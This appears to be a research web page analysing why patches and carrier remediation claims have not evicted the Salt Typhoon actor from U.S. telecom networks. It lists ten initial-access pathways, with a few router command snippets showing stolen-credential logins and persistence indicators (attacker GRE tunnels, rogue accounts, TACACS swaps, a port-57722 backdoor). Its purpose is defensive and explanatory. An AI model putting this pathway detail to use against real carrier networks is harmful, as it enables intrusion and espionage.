Active infections · patches that didn’t fix it

Why the patches didn’t fix the problem — and how Salt Typhoon could still get in today.

Two halves. Part 1: a technical analysis of why each claimed fix — Cisco CVE patches, the multi-vendor patch inventory, the AT&T / Verizon “contained” statements, CISA hardening, the FCC reporting rule, the withheld Mandiant assessments — does not actually close the Salt Typhoon TTP class. Part 2: a per-pathway breakdown, with command- and protocol-level detail, of how the actor could obtain initial access to a fully-patched U.S. carrier network today. Both halves are anchored against the FBI’s on-record February 2026 position that the threat remains active.

Status as of February 2026 “The threat posed by Salt Typhoon actors and the rest of the PRC intelligence apparatus … is still very, very much ongoing.” — Michael Machtinger, Deputy Assistant Director for Cyber Intelligence at the FBI. CyberTalks event, Washington D.C., February 19, 2026.1
Part 1 · Why each patch failed

The technical reasons every claimed fix is non-persistent

Each card below documents what the fix technically covers, what it provably does not cover, and why the residual gap remains exploitable against the documented Salt Typhoon TTP class.2

Vendor patch Cisco IOS XE / IOS Classic CVE patches (2018-0171, 2023-20198, 2023-20273) Partial

Cisco shipped the Smart Install fix in 2018 and the IOS XE Web UI chain (CVE-2023-20198 privilege escalation + CVE-2023-20273 command injection) in October 2023.3 The image upgrade closes the unauthenticated entry vector on patched devices: the web-UI account-creation path is blocked, the Smart Install service can be disabled (no vstack), and the WSMA endpoint validation is hardened.

What the patch does NOT do

Pre-existing accounts created via the bug remain in startup-config. The patch is an image upgrade; it does not audit show running-config | include username for accounts added during the exploitation window. The patched router boots with the attacker’s local accounts intact.

It does not remove the persistence kit. GRE tunnel interfaces (interface Tunnel0 / tunnel mode gre ip / tunnel destination <attacker>), AAA / TACACS+ server IP swaps, ACL drift admitting attacker source IPs, and SNMP community-string changes all survive the image upgrade as part of running- and startup-config.2

It does not remove the alternate-port SSH backdoor. The Linux-side sshd_operns daemon Talos documented on TCP 57722 — with authorized_keys added under root via /etc/passwd / /etc/shadow modification — is not touched by the IOS XE image patch.2

It does not address ROMMON-level persistence. Per MITRE T1542.004,4 defenders cannot independently validate ROMMON image integrity without vendor support. The image patch reaches the IOS XE binary; it does not reach the boot loader.

It does not rotate stolen credentials. Per Talos, the primary initial-access vector in investigated incidents was legitimate stolen credentials — not CVE exploitation.2 A patched router is still trivially accessible with a stolen-but-not-rotated admin credential.

Deployment lag is the secondary surface. Salt Typhoon weaponized CVE-2023-20198 fourteen months after the patch shipped; the lag between “Cisco shipped a fix” and “every carrier has it deployed in production” is itself the attack window.

Vendor patch Multi-vendor edge-device patches (Palo Alto, Ivanti, Fortinet, Sophos, Exchange, Citrix) Partial

The CISA joint advisory AA25-239A5 lists fixes for: Palo Alto CVE-2024-3400; Ivanti CVE-2024-21887 and CVE-2023-46805; Fortinet CVE-2023-48788; Sophos CVE-2022-3236; Microsoft Exchange CVE-2021-26855 (ProxyLogon); Citrix NetScaler CVE-2025-5777 (CitrixBleed 2, added to CISA KEV July 11, 2025).

What the patches do NOT do

Same gap as the Cisco patches: each closes its respective N-day entry vector on patched devices, but none addresses the persistence kit, credential rotation, ROMMON, or the lateral-trust graph already established.

Censys continues to find tens of thousands of public exposures of the affected device families through 2025 and into 20266 — the patches exist; deployment is uneven; the Censys analysis explicitly cautions that observed exposure declines may reflect routine reconfiguration rather than successful remediation.

CitrixBleed 2 is a memory-overread. The vulnerability discloses session tokens, which an attacker can then replay to bypass MFA on the NetScaler gateway.7 Patching closes the read; it does not invalidate session tokens already exfiltrated.

Carrier statement AT&T — “We detect no activity by nation-state actors” (December 2024) Not persistent

AT&T’s December 2024 statement8 rests on a visibility-based assessment: “we don’t see them.”

Why visibility-based assertion is not persistent against this actor

Standard IOS XE auditing commands do not surface Guest Shell processes. Salt Typhoon’s documented playbook enables Guest Shell (guestshell enable) and deploys tooling inside the Linux container. show process cpu, show users, and show running-config on the network OS do not enumerate processes running inside the guest container.2

JumbledPath impairs logging along the jump-path. Talos documents that the actor’s custom Go ELF binary “attempted to clear logs and impair logging along the jump-path”2 — the very evidence the carrier’s detection rests on is what the actor explicitly removes.

GRE-tunneled exfil looks like legitimate routing. Mirroring traffic into a GRE tunnel encapsulates the bytes inside an outer header that defensive netflow attributes to routing, not data exfiltration.9 Carrier flow analytics that don’t inspect inside GRE see clean routing traffic.

ROMMON-level implants live below the carrier’s visibility stack. Pre-OS boot persistence (MITRE T1542.0044) operates before the IOS XE OS starts; carrier EDR / SIEM cannot reach it.

The Mandiant forensic assessment exists, and AT&T refused to provide it when Senator Cantwell demanded the documentation for Senate Commerce oversight.10 The forensic evidence the “no activity detected” claim would rest on is withheld from congressional review.

FBI counter-assessment. CISA / FBI on the record in December 2024 said Salt Typhoon was still active in U.S. networks;11 FBI reiterated the position in February 2026.1

Carrier statement Verizon — “contained the cyber incident” (December 2024) Not persistent

Verizon’s December 2024 statement8 uses the word “contained” with no technical definition attached. The company stated it “cannot provide specific details about their responsive actions because doing so would jeopardize cybersecurity protection methodologies.”

Why the “contained” framing is not persistent

“Contained” is not a defined technical term. It could mean: a specific GRE tunnel on a specific router was removed; or: detection signatures were deployed; or: a network segment was isolated. None of these is a synchronized-cut eviction across the affected estate.

CISA AA25-239A explicitly states that partial response alerts the actor. “Partial response actions may alert the actors to an ongoing investigation and jeopardize the ability to conduct full eviction.”5 A “contained” framing that isn’t simultaneous across the trust graph (iBGP, OSPF/ISIS, TACACS+, SNMPv3) increases the risk of further entrenchment elsewhere.

Verizon also engaged Mandiant. Verizon also refused to provide the Mandiant report to Senator Cantwell.10 Same withholding pattern as AT&T.

Senate Commerce expert testimony, December 2025. Expert witnesses unanimously concluded U.S. communications networks remain vulnerable.12

Carrier statement T-Mobile / Lumen / Charter / Windstream / Consolidated / Viasat — silent or sparse Unknown

T-Mobile claimed “hackers had no access to customer call and text logs”;13 Lumen claimed containment without public technical detail; Charter, Windstream, Consolidated, and Viasat have not made remediation statements at the level of AT&T or Verizon.

Why silence is not persistence

None of the six carriers has published an audit-shaped remediation report. The Senate Commerce documentation demand was targeted primarily at AT&T and Verizon; the other six remain unaudited in public record. Persistence is unknown because the work is unknown.

Federal guidance CISA — December 2024 hardening and AA25-239A (August 2025) Partial

CISA shipped concrete controls: no vstack (Smart Install off), no ip http server / no ip http secure-server (web UI off), VTY transport output none, trailing deny any any log ACL hygiene, Type 8 / Type 6 credential storage, SSH listener audit, simultaneous-eviction discipline, OOB management.5

Why guidance alone is not persistence

CISA guidance is voluntary. Carriers are not compelled to adopt, audit against, or document compliance.

The one enforceable companion piece was rolled back. The FCC’s Communications-Service-Provider Cybersecurity Reporting Requirements — the only audit-shaped federal rule with teeth — was partially rolled back in November 2025; the FCC’s own draft ruling conceded the underlying vulnerabilities “are still being exploited.”14

Private IR Mandiant — AT&T and Verizon forensic assessments (withheld) Unknown / withheld

Both AT&T and Verizon confirmed they engaged Mandiant.10 Both refused to provide the assessment to Senator Cantwell when Senate Commerce demanded the documentation.

Why withheld assessments are not persistence

By definition: what is not disclosed cannot be audited. The methodology, scope, and conclusions of the assessments are unknown. Whether the assessment covered ROMMON validation, credential rotation, the SS7 / Diameter layer, or even the simultaneous-eviction discipline CISA AA25-239A requires — none of that is in public record.

Part 1 · Synthesis

Persistence-dimension scoring across all claimed fixes

Each fix scored against the six dimensions a real remediation would have to cover. Derived from the Talos persistence-kit inventory2, the credential-layer surface15, the ROMMONkit / firmware layer4, the SS7/Diameter signaling layer11, the auditability requirement, and the simultaneous-eviction constraint5.

Claimed fix Removes persistence kit Rotates credentials Addresses ROMMON Touches SS7 / Diameter Documented & auditable Synchronized cut
Cisco CVE patches no no no n/a yes n/a
Multi-vendor CVE patches no no no n/a yes n/a
AT&T “no activity detected” unknown unknown unknown no withheld unknown
Verizon “contained” unknown unknown unknown no withheld unknown
Other 6 telecoms (silent) unknown unknown unknown no no unknown
CISA hardening guidance partial (if adopted) partial (if rotated) no no voluntary partial
FCC reporting rule n/a n/a n/a n/a rolled back Nov 2025 n/a
Mandiant assessments withheld withheld withheld withheld withheld withheld

Reading horizontally: no claimed fix scores “yes” across all six dimensions. Reading vertically: no dimension scores “yes” across all the claimed fixes. The gap isn’t any one fix — the gap is the absence of an integrated operation with documented, simultaneous, multi-dimensional coverage.

Part 2 · Initial-access pathways still open

How Salt Typhoon could still obtain initial access today

The pathways below are independently sufficient for fresh initial access to a fully-patched carrier network. Each is grounded in either the Talos IR documentation, the CISA joint advisory, or contemporaneous public reporting; none requires a novel zero-day.

  1. Credential reuse on fully-patched routers.

    Per Cisco Talos, the primary initial-access vector in investigated incidents was the threat actor obtaining legitimate victim login credentials, not CVE exploitation.2 Anne Neuberger’s December 2024 White House briefing put the stolen-credential surface at ~100,000 router admin accounts.15 A fully-patched IOS XE router with a stolen-but-not-rotated admin credential authenticates a login as legitimate. The patch is irrelevant.

    ## Pathway P1 — fully-patched router; stolen credential still valid:
$ ssh admin@<carrier-router>
admin@<carrier-router>'s password: # stolen credential, never rotated
<router># enable
<router>## # full administrative shell on a patched device

  2. Re-use of surviving persistence-kit footholds left in running-config.

    If the carrier’s remediation did not audit the device’s running-config against a golden template, every Talos-documented config-level persistence indicator survives the image patch:

    ## Pathway P2 — running-config indicators that survive patching:
<router>## show running-config | include tunnel mode gre
 tunnel mode gre ip                              # surviving GRE exfil tunnel
<router>## show running-config | include username
 username typhoon_admin privilege 15 secret ...  # attacker-added local user
<router>## show running-config | section tacacs-server
 tacacs-server host <attacker-ip>                # AAA server IP swap
<router>## show ip socket | include 57722
 tcp     57722        0.0.0.0:0      LISTEN     # sshd_operns backdoor
<router>## show guestshell
 Guest Shell: Enabled                            # container with attacker tools

    Any one of these is sufficient for fresh access; CISA’s remediation guidance is to audit every line.5 Without that audit, the patch closes the front door while the back doors remain open.

  3. End-of-life and legacy platforms that cannot be patched.

    Cisco IOS Classic 12.x ISRs, EOL Catalyst 6500 supervisor engines, and legacy NX-OS chassis are out of vendor support. No patch ships. Salt Typhoon’s CVE-2018-0171 (Smart Install) Talos-confirmed exploitation case2 sits on exactly this class of device. The only fix is physical replacement; until then, the entry vector remains live.

  4. Multi-vendor N-day inventory not deployed at every carrier.

    The joint advisory inventory5 spans Cisco, Palo Alto (CVE-2024-3400), Ivanti (CVE-2024-21887, CVE-2023-46805), Fortinet (CVE-2023-48788), Sophos (CVE-2022-3236), Microsoft Exchange (CVE-2021-26855 ProxyLogon), and Citrix NetScaler (CVE-2025-5777 CitrixBleed 2). Carrier ecosystems include hundreds of vendor-adjacent devices: VPN concentrators, jump hosts, mail gateways, identity infrastructure. Any one un-patched device on any of these vendors is an alternative entry path into the same carrier network. Censys reports tens of thousands of public exposures across these families as of 2026.6

  5. CitrixBleed 2 (CVE-2025-5777) — recent disclosure, session-token disclosure.

    An out-of-bounds memory read on NetScaler Gateway / AAA virtual servers (CVSS 9.3) lets an unauthenticated attacker read process memory and recover valid session tokens, which can then be replayed to bypass MFA on the gateway.7 Added to the CISA KEV catalog on July 11, 2025. Patching closes the read; it does not invalidate session tokens already exfiltrated. Any carrier or carrier-adjacent organization running unpatched 14.1 prior to 14.1-43.56, 13.1 prior to 13.1-58.32, or EOL 12.1 / 13.0 has either an active or a historical exposure.

  6. Variant-hunt against already-disclosed bug-class sink families.

    Salt Typhoon’s observed tradecraft is variant research5: patched advisories become the seed for sibling-sink hunts in the same binary. The Web Services Management Agent (WSMA) sink class that yielded CVE-2023-20198 / CVE-2023-20273 is the kind of surface where a second variant remains findable by an actor running the workflow continuously and not by defenders without equivalent automation. The 14-month gap between CVE-2023-20198 disclosure and its weaponization at scale is the empirical proof that this pathway works on the offensive side and isn’t being matched on the defensive side.

  7. SS7 / Diameter signaling-layer abuse — un-patchable by design.

    SS7 (2G/3G) and Diameter (4G/5G control plane) lack origin authentication by protocol design. Any peer connected to the SS7 international transit network can issue queries that the receiving switch will honor; fraudulent signaling sources can be inserted at HLR / HSS, MSC, MME, or PGW boundaries. The defense is architectural — SS7 firewalls (Mavenir, Adaptive Mobile, Cellusys) at the interconnect, Diameter Edge Agent screening per GSMA FS.11 / FS.19 — not a patch.11 Until that architectural fix is universally deployed (years and billions of dollars per public reporting), the signaling plane remains a parallel persistence path independent of the IP-layer device fleet.

  8. Compromised backups restored after the cut.

    Any device backup or startup-config produced during the residency window (March 2024 onward for the National Guard case16; 2023–2024 for the carrier compromises) is presumed contaminated. A carrier ops engineer restoring “known good” config from such a backup re-installs the persistence kit on the patched device. The CISA simultaneous-eviction guidance5 specifies rebuilding from a golden template, not from device backups — absent that discipline, backup restore is itself a re-introduction pathway.

  9. National Guard exfiltration data weaponized as initial-access intelligence.

    Per the June 2025 DHS memo,16 Salt Typhoon exfiltrated from a U.S. state’s Army National Guard network: administrator credentials, full network diagrams, geographic-location maps, PII of service members, and the unit’s data traffic with counterparts in every other U.S. state and at least four U.S. territories. 1,462 network-configuration files from ~70 U.S. government and critical-infrastructure entities across 12 sectors during 2023–2024. This is pre-positioned intelligence: the loot from one Guard unit maps directly onto the topology of the cybersecurity partners of every other unit. Future intrusions land on networks whose layout the actor already has in hand. The DHS memo’s explicit warning is that this likely enables follow-on compromise of other state Guard units and their fusion-center partners.

  10. Fresh credential theft against engineers with router access.

    Even if the original ~100,000-credential surface were fully rotated tomorrow, the next phishing campaign against a carrier engineer with TACACS+ / RADIUS credentials, or with FIDO2-but-misconfigured admin auth, reproduces the credential-reuse pathway above. Per CISA hardening guidance,5 phishing-resistant MFA on every admin account is the structural defense; absent that, fresh credentials enter the actor’s rotation continuously.

Bottom line

The patches close some entry vectors. None of them removes a resident attacker, rotates the credential surface, validates ROMMON, addresses the signaling plane, or audits the running-config persistence kit. Each of the ten pathways above remains independently sufficient for fresh initial access to a fully-patched carrier today. That is why the FBI is still on the record — in February 2026 — calling Salt Typhoon “still very, very much ongoing.”1

What removal would actually require — the simultaneous-eviction discipline, the six-criterion closure definition, the synchronized-cut planner, and the federal brokering authority — lives on the Closure, eviction runbook, and Salt Typhoon Research pages.

References

  1. CyberScoop. FBI: Threats from Salt Typhoon are ‘still very much ongoing’. CyberTalks event, February 19, 2026. cyberscoop.com/fbi-salt-typhoon-ongoing-threat-cybertalks-2026/. Speaker: Michael Machtinger, Deputy Assistant Director for Cyber Intelligence at the FBI.
  2. Cisco Talos. Weathering the storm: In the midst of a Typhoon. February 2025. blog.talosintelligence.com/salt-typhoon-analysis/. Primary source for the credential-first finding, JumbledPath, GRE-tunnel persistence, Guest Shell abuse, sshd_operns on 57722, and the running-config / log-clearing inventory.
  3. Cisco. Cisco IOS XE Software Hardening Guide and PSIRT advisories for CVE-2018-0171, CVE-2023-20198, CVE-2023-20273. sec.cloudapps.cisco.com/security/center/resources/IOS_XE_hardening.
  4. MITRE ATT&CK. Pre-OS Boot: ROMMONkit, Sub-technique T1542.004. attack.mitre.org/techniques/T1542/004/.
  5. CISA, NSA, FBI, and international partners. Joint Cybersecurity Advisory AA25-239A: Chinese state-sponsored cyber actors. August 27, 2025. cisa.gov/news-events/cybersecurity-advisories/aa25-239a. Source for the simultaneous-eviction discipline and the multi-vendor CVE inventory.
  6. Censys. The Persistent Threat of Salt Typhoon: Tracking Exposures of Potentially Targeted Devices. 2026. censys.com/blog/the-persistent-threat-of-salt-typhoon-tracking-exposures-of-potentially-targeted-devices.
  7. Citrix Support · SocRadar · SentinelOne. CVE-2025-5777 NetScaler Gateway / AAA virtual server memory-overread (CitrixBleed 2). support.citrix.com — CTX693420; socradar.io — CitrixBleed 2. Added to CISA KEV July 11, 2025.
  8. Cybersecurity Dive. AT&T, Verizon say they evicted Salt Typhoon from their networks. December 2024. cybersecuritydive.com/news/att-verizon-salt-typhoon.
  9. Industrial Cyber. Salt Typhoon used GRE tunnels for traffic mirroring and exfiltration on compromised Cisco devices. February 2025. industrialcyber.co — Salt Typhoon LOTL.
  10. U.S. Senate Committee on Commerce, Science, and Transportation. Cantwell seeks digital forensics expert’s assessments of AT&T and Verizon network security; demands AT&T, Verizon CEOs come clean. commerce.senate.gov. Source for the Mandiant-assessments-withheld claim.
  11. CyberScoop. U.S. government says Salt Typhoon is still in telecom networks. December 3, 2024. cyberscoop.com/u-s-government-says-salt-typhoon-is-still-in-telecom-networks; A house full of open windows: Why telecoms may never purge their networks of Salt Typhoon, cyberscoop.com/salt-typhoon-chinese-hackers-us-telecom-breach.
  12. U.S. Senate Committee on Commerce, Science, and Transportation. Experts agree U.S. communications networks remain vulnerable following Salt Typhoon hack. December 2025. commerce.senate.gov/2025/12/experts-agree-u-s-communications-networks-remain-vulnerable.
  13. TechCrunch. Salt Typhoon is hacking the world’s phone and internet giants — here’s everywhere that’s been hit. March 2026. techcrunch.com/2026/03/09/salt-typhoon-china-who-has-been-hacked-global-telecom-giants.
  14. U.S. Senate Committee on Commerce, Science, and Transportation. Cantwell statement on the FCC’s rollback of post-Salt-Typhoon network-protection rules. November 2025. commerce.senate.gov — Cantwell on FCC rollback.
  15. Anne Neuberger, Deputy National Security Advisor for Cyber and Emerging Technology. White House press briefing remarks on Salt Typhoon — nine confirmed U.S. carrier compromises and the ~100,000-router admin credential figure. December 2024.
  16. Department of Homeland Security · Office of Intelligence and Analysis. Salt Typhoon: Data Theft Likely Signals Expanded Targeting. Memo dated June 11, 2025. Obtained via FOIA by Property of the People; first reported by NBC News. nbcnews.com.